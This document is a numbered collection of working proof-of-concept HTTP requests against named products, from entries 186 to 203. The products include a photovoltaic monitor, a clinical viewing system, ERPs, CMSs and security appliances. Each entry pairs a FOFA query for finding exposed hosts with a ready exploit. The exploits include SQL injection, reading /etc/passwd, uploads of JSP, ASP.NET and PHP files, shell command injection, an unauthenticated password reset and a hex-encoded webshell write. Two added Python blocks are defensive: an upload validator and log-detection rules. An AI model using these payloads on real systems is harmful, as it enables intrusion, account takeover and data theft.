GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
Host: host

186. F-logic DataCube3 SQL injection
CVE-2024-31750
F-logic DataCube3 is a compact terminal measurement system for photovoltaic power generation systems.
FOFA:title=="DataCube3"
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded

req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450

187. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Mura CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1

188. 叁体-佳会 video conferencing attachment arbitrary file read
version <= 3.9.7
FOFA:body="/system/get_rtc_user_defined_info?site_id"
GET /attachment?file=/etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

189. 蓝网科技 (LANWON) clinical viewing system deleteStudy SQL injection
FOFA:app="LANWON-临床浏览系统"
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

190. Short video matrix marketing system poihuoqu arbitrary file read
FOFA:title=="短视频矩阵营销系统"
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

poi=file:///etc/passwd

191. 亿赛通 electronic document security management system NavigationAjax SQL injection
FOFA:body="/CDGServer3/index.jsp"
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=

192. Futong Tianxia (富通天下) Foreign Trade ERP UploadEmailAttr arbitrary file upload
FOFA:title="用户登录_富通天下外贸ERP"
name=.ashx makes the upload land as an .ashx file, which IIS executes as an ASP.NET handler; the request body is a minimal handler that writes "test".
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded

<%@ WebHandler Language="C#" Class="AverageHandler" %>
using System;
using System.Web;

public class AverageHandler : IHttpHandler
{
    public bool IsReusable
    { get { return true; } }

    public void ProcessRequest(HttpContext ctx)
    {
        ctx.Response.Write("test");
    }
}

193. Hillstone Networks (山石网科) 云鉴 Security Management System setSystemTimeAction command execution
FOFA:body="山石云鉴主机安全管理系统"
Three requests: fetch a CSRF token with a chosen PHPSESSID, submit the payload with that token and the same PHPSESSID (the param value is evaluated server-side; the PoC passes a Python os.system call that writes a marker file under the web root), then read the marker back. Content-Length must match the body actually sent.
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
Host:
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0


POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
Host:
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
Content-Length: 84

param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')


GET /master/img/config HTTP/1.1
Host:
User-Agent: Mozilla/5.0

194. FE Enterprise Operation Management Platform (飞企互联) uploadAttachmentServlet arbitrary file upload
FOFA:app="FE-协作平台"
Probe: if a request to /servlet/uploadAttachmentServlet returns a response, the endpoint is present and the vulnerability exists. The filename field is stored as given, so the ../ sequences place the JSP inside the deployed fe.war.

POST /servlet/uploadAttachmentServlet HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk

------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
Content-Type: text/plain

<% out.println("hello");%>
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="json"

{"iq":{"query":{"UpdateType":"mail"}}}
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--

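The uploads in 192 and 194 work because the server keeps whatever name the client supplies: 192 passes name=.ashx so the stored body becomes an ASP.NET handler, and 194 puts ../ in the filename to drop a JSP into the deployed fe.war. The Python below is an added example written for this page, not code from either product. It parses a multipart body such as the one above with the standard-library MIME parser, reduces the filename to a bare name, allow-lists the extension, and checks the body's leading bytes instead of trusting the client's Content-Type (the mislabelling that entry 203 below relies on). The function names, the allow-list and the sample body are this example's own.

```python
import os
import posixpath
import re
from email.parser import BytesParser
from email.policy import HTTP

# Illustrative allow-list for this example: permitted extensions and the magic bytes the
# stored body must begin with. A real handler lists only what its feature actually needs.
ALLOWED_TYPES = {
    ".jpg":  (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".png":  (b"\x89PNG\r\n\x1a\n",),
    ".gif":  (b"GIF87a", b"GIF89a"),
    ".pdf":  (b"%PDF-",),
}
# A bare name: no separators, no leading dot (so ".ashx" from PoC 192 is refused outright).
SAFE_NAME = re.compile(r"^[A-Za-z0-9_-][A-Za-z0-9_.-]{0,99}$")
SCRIPT_MARKERS = (b"<%", b"<?php", b"<script")


def safe_upload_name(client_filename: str) -> str:
    """Reduce a client-supplied filename to a bare, allow-listed name, or raise ValueError."""
    # Normalise both separators: IIS accepts '\' and '/', Java and PHP servers accept '/'.
    name = posixpath.basename(client_filename.replace("\\", "/"))
    # '../../../../../jboss/web/fe.war/hello.jsp' (PoC 194) is now just 'hello.jsp'.
    if not SAFE_NAME.match(name):
        raise ValueError("empty, hidden or badly formed filename")
    # Judge by the LAST extension: 'a.jpg.ashx' is an .ashx handler, not a picture.
    ext = os.path.splitext(name)[1].lower()
    if ext not in ALLOWED_TYPES:
        raise ValueError(f"extension {ext!r} not allowed")
    return name


def validate_upload(client_filename: str, body: bytes) -> str:
    """Return the name to store under, or raise ValueError when the upload must be refused."""
    name = safe_upload_name(client_filename)
    ext = os.path.splitext(name)[1].lower()
    # The client's Content-Type header is never consulted; the first bytes decide.
    if not any(body.startswith(magic) for magic in ALLOWED_TYPES[ext]):
        raise ValueError(f"body does not start like a {ext} file")
    # A polyglot with a genuine image header but a script payload is refused as well.
    if any(marker in body for marker in SCRIPT_MARKERS):
        raise ValueError("script marker inside body")
    return name


def upload_verdict(client_filename: str, body: bytes) -> str:
    """'accepted:<stored name>' or 'rejected:<reason>' for one upload."""
    try:
        return "accepted:" + validate_upload(client_filename, body)
    except ValueError as err:
        return "rejected:" + str(err)


def first_file_part(raw_multipart: bytes, boundary: str):
    """Parse a multipart/form-data body with the stdlib MIME parser and return
    (filename, bytes) of its first file part."""
    prefix = f"Content-Type: multipart/form-data; boundary={boundary}\r\n\r\n".encode()
    msg = BytesParser(policy=HTTP).parsebytes(prefix + raw_multipart)
    for part in msg.iter_parts():
        if part.get_filename():
            return part.get_filename(), part.get_payload(decode=True)
    raise ValueError("no file part in request")


def verdict_for_request(raw_multipart: bytes, boundary: str) -> str:
    """Verdict for the first file part of a raw multipart body."""
    filename, content = first_file_part(raw_multipart, boundary)
    return upload_verdict(filename, content)


# Constructed sample: the body of PoC 194 as the client sends it (CRLF line endings).
BOUNDARY_194 = "----WebKitFormBoundaryKNt0t4vBe8cX9rZk"
BODY_194 = (
    "------WebKitFormBoundaryKNt0t4vBe8cX9rZk\r\n"
    'Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"\r\n'
    "Content-Type: text/plain\r\n"
    "\r\n"
    '<% out.println("hello");%>\r\n'
    "------WebKitFormBoundaryKNt0t4vBe8cX9rZk\r\n"
    'Content-Disposition: form-data; name="json"\r\n'
    "\r\n"
    '{"iq":{"query":{"UpdateType":"mail"}}}\r\n'
    "------WebKitFormBoundaryKNt0t4vBe8cX9rZk--\r\n"
).encode()

if __name__ == "__main__":
    print(verdict_for_request(BODY_194, BOUNDARY_194))
    print(upload_verdict(".ashx", b"<%@ WebHandler %>"))
    print(upload_verdict("photo.jpg", b"\xff\xd8\xff\xe0" + b"\0" * 16))
```

The order of the checks matters: the name is reduced to a basename before anything is compared, the last extension is the one judged, and the body check runs even when the extension is acceptable, so a JSP or PHP body renamed to .jpg is refused on content rather than on the label the client chose.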
195. Volans (飞鱼星) Internet Behavior Management System send_order.cgi command execution
FOFA:title=="飞鱼星企业级智能上网行为管理系统"
The name value of the JSON body is placed into a shell command; the ; separators run uname -a.
POST /send_order.cgi?parameter=operation HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}

196. Henan Fengsu Technology (河南省风速科技) Unified Authentication Platform password reset
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
No session or token is sent: xgh is the target account, newPass the password to set.
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 45
Connection: close

{"xgh":"test","newPass":"test666","email":""}

197. Zheda Ente (浙大恩特) Customer Resource Management System Quotegask_editAction SQL injection
FOFA:app="浙大恩特客户资源管理系统"
The ;.js suffix on the action path is part of the PoC; goonumStr is injectable (a UNION SELECT of 111*111, i.e. 12321).
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close

198. Aliyun Drive (阿里云盘) WebDAV command injection
CVE-2024-29640
The sid parameter of the aliyundrive-webdav LuCI page reaches a shell. URL-decoded it is `ls />/www/aaa.txt` (backticks included), which writes the listing into the OpenWrt web root. The request carries a LuCI sysauth session cookie.
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

199. Cockpit system assetsmanager/upload endpoint file upload
FOFA:title="Authenticate Please!"

1. Run the PoC to obtain the CSRF token, then obtain a session cookie, then upload and access the result:
GET /auth/login?to=/ HTTP/1.1

Response: 200, containing csfr:"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"

2. Use the JWT obtained in the previous step to get a session cookie (the PoC logs in as admin/admin):

POST /auth/check HTTP/1.1
Content-Type: application/json

{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}

Response: 200, with:
Set-Cookie: mysession=95524f01e238bf51bb60d77ede3bea92; path=/

3. Upload a PHP file with that session:
POST /assetsmanager/upload HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92

-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
Content-Type: text/php

<?php echo "tttt";unlink(__FILE__);?>
-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="folder"


-----------------------------36D28FBc36bd6feE7Fb3--

The uploaded file is then reachable at /storage/uploads/tttt.php

200. SeaCMS (海洋影视管理系统) dmku SQL injection
FOFA:app="海洋CMS"
MySQL time-based blind injection in the id parameter of the dmku endpoint: (select(0)from(select(sleep(5)))v) delays the response by 5 seconds.
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

201. Founder (方正) All-Media News Editing System binary SQL injection
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
The TableName parameter is concatenated into the query. URL-decoded it is: DOM_IMAGE where REFID=-1 union select '1'; WAITFOR DELAY '0:0:5';select DOM_IMAGE from IMG_LARGE_PATH, i.e. stacked MSSQL statements with a 5-second delay.
POST /newsedit/newsplan/task/binary.do HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1

202. 微擎 system AccountEdit arbitrary file upload
FOFA:body="/Widgets/WidgetCollection/"
Obtain the current __VIEWSTATE and __EVENTVALIDATION values:
GET /User/AccountEdit.aspx HTTP/1.1
Host: 滑板人之家
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
Content-Length: 0

Replace __VIEWSTATE and __EVENTVALIDATION below with the values obtained, then post the form:
POST /User/AccountEdit.aspx HTTP/1.1
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687

-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__VIEWSTATE"

__VIEWSTATE
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__EVENTVALIDATION"

__EVENTVALIDATION
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
Content-Type: text/plain

Hello World!
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"

上传图片
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"


-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"


-----------------------------786435874t38587593865736587346567358735687--

The uploaded file is then reachable at /_data/Uploads/1123.txt

203. Redsea (红海云) EHR PtFjk file upload
FOFA:body="RedseaPlatform"
The fj_file part is stored under its client-supplied .jsp name; the PoC labels a JSP body as image/jpeg and the label is not checked against the content.
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
Host: x.x.x.x
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Length: 210

------WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
Content-Type:image/jpeg

<% out.print("hello,eHR");%>
------WebKitFormBoundaryt7WbDl1tXogoZys4--
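For the defensive use this list is meant for, the Python below is an added example, not code from the original page or from any of the products above. It turns the request lines of entries 189 to 203 into access-log rules and runs them over a few constructed combined-format log lines. A standard access log carries only the request line, so entries whose payload travels in the POST body (190, 191, 193, 194, 196, 199, 201, 202 and the multipart uploads) can only be matched on method plus endpoint; confirming those needs a WAF or application log that records bodies. The rule descriptions, the regexes and the sample lines are this example's own.

```python
import re
from urllib.parse import unquote, unquote_plus

# One rule per PoC above: (entry number, description, required method or None,
# path regex, regex over the URL-decoded "path?query" or None).
# Rules with a payload regex match the injected value itself; rules without one are
# hunting leads that flag any use of the endpoint and need body-level confirmation.
RULES = [
    (189, "deleteStudy time-based SQLi",             None,   r"/xds/deleteStudy\.php",                        r"waitfor\s+delay"),
    (190, "poihuoqu file read endpoint",             "POST", r"/admin/Userinfo/poihuoqu",                     None),
    (191, "NavigationAjax SQLi endpoint",            "POST", r"/CDGServer3/(?:js/\.\./)?NavigationAjax",      None),
    (192, "UploadEmailAttr handler-extension upload","POST", r"/JoinfApp/EMail/UploadEmailAttr",              r"name=\.?(?:ashx|aspx|asmx)"),
    (193, "setSystemTimeAction command execution",   "POST", r"/master/ajaxActions/setSystemTimeAction\.php", None),
    (194, "uploadAttachmentServlet upload",          "POST", r"/servlet/uploadAttachmentServlet",             None),
    (195, "send_order.cgi command execution",        "POST", r"/send_order\.cgi",                             r"parameter=operation"),
    (196, "resetPasswordBySuper password reset",     "POST", r"/cas/userCtl/resetPasswordBySuper",            None),
    (197, "Quotegask_editAction union SQLi",         None,   r"/entsoft/Quotegask_editAction\.entweb",        r"union\s+(?:all\s+)?select"),
    (198, "aliyundrive-webdav command injection",    None,   r"/aliyundrive-webdav/query",                    r"sid=[^&]*[`$;|&]"),
    (199, "assetsmanager/upload",                    "POST", r"/assetsmanager/upload",                        None),
    (200, "dmku time-based SQLi",                    None,   r"/dmplayer/dmku/",                               r"sleep\s*\("),
    (201, "binary.do SQLi endpoint",                 "POST", r"/newsedit/newsplan/task/binary\.do",           None),
    (202, "AccountEdit.aspx upload endpoint",        "POST", r"/User/AccountEdit\.aspx",                      None),
    (203, "PtFjk.mob upload",                        "POST", r"/RedseaPlatform/PtFjk\.mob",                   r"method=upload"),
]
COMPILED = [
    (entry, desc, method, re.compile(path_re, re.I), re.compile(payload_re, re.I) if payload_re else None)
    for entry, desc, method, path_re, payload_re in RULES
]

# Combined log format: ip - user [time] "METHOD URI PROTO" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})'
)


def match_line(line: str):
    """Return (entry, description, client ip, status) for the first rule that matches, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path, _, query = m.group("uri").partition("?")
    # Decode once so %27, %20 and '+' compare as the characters the application sees;
    # the path is decoded too, because an encoded 'js/../' would otherwise hide 191's endpoint.
    path = unquote(path)
    decoded = path + "?" + unquote_plus(query)
    for entry, desc, method, path_re, payload_re in COMPILED:
        if method and m.group("method") != method:
            continue
        if path_re.search(path) and (payload_re is None or payload_re.search(decoded)):
            return entry, desc, m.group("ip"), int(m.group("status"))
    return None


def scan(lines):
    """Run every rule over every line; return the hits in log order."""
    return [hit for hit in (match_line(line) for line in lines) if hit]


# Constructed sample lines (not real traffic): five PoC requests from this list, then
# two benign requests and one GET to an endpoint whose rule requires POST.
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jun/2024:10:00:01 +0800] "GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [01/Jun/2024:10:00:02 +0800] "GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60ls%20/%3E/www/aaa.txt%60%20 HTTP/1.1" 200 77 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [01/Jun/2024:10:00:03 +0800] "POST /CDGServer3/js/../NavigationAjax HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [01/Jun/2024:10:00:04 +0800] "GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1" 200 12 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [01/Jun/2024:10:00:05 +0800] "POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1" 200 64 "-" "Mozilla/5.0"',
    '192.0.2.77 - - [01/Jun/2024:10:00:06 +0800] "GET /xds/index.php HTTP/1.1" 200 3000 "-" "Mozilla/5.0"',
    '192.0.2.77 - - [01/Jun/2024:10:00:07 +0800] "GET /js/player/dmplayer/dmku/?ac=list&id=12 HTTP/1.1" 200 220 "-" "Mozilla/5.0"',
    '192.0.2.77 - - [01/Jun/2024:10:00:08 +0800] "GET /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1" 405 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for entry, desc, ip, status in scan(SAMPLE_LOG):
        print(f"entry {entry:<3} {desc:<42} from {ip} (HTTP {status})")
```

Feed the real log through `scan()` one line at a time (or pipe it into the script after replacing SAMPLE_LOG with a file iterator); a hit on a time-based rule with a response time of roughly five seconds, or a 200 on an upload endpoint followed by a request for the dropped file, is what separates a scan from a success.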